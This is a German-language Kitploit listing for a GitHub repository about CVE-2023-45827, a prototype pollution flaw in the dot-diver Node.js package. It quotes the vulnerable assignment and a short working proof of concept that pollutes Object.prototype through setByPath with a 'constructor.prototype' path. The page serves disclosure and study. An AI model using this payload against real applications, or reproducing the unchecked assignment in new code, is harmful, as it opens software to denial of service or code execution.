Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-45827 — pp | Kitploit
Tools/GitHubGitHub/200101whoami/cve-2023-45827
Statische AnalyseSchwachstellenanalyseCode-AnalyseExploitationWebsicherheit
GitHub200101whoami/cve-2023-45827

CVE-2023-45827

pp

Repository anzeigen
5vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-45827

Schwachstellenübersicht

  • CVE-2023-45827

  • CVSS : 9.8

    1. November 2023
  • Prototype Pollution im node.js-Paket

  • Im Rahmen des rebob-Projekts

Schwachstellenbeschreibung

github advisories

Dies ist eine Prototype Pollution (PP) Schwachstelle in dot-diver. Sie kann zu RCE führen.

verwundbarer Code

root@kitploit:~
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
//eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value

PoC

root@kitploit:~
import { getByPath, setByPath } from '@clickbar/dot-diver'

console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo

Es handelt sich um Prototype Pollution (PP) und kann zu DoS, RCE usw. führen.

target package

Tool herunterladen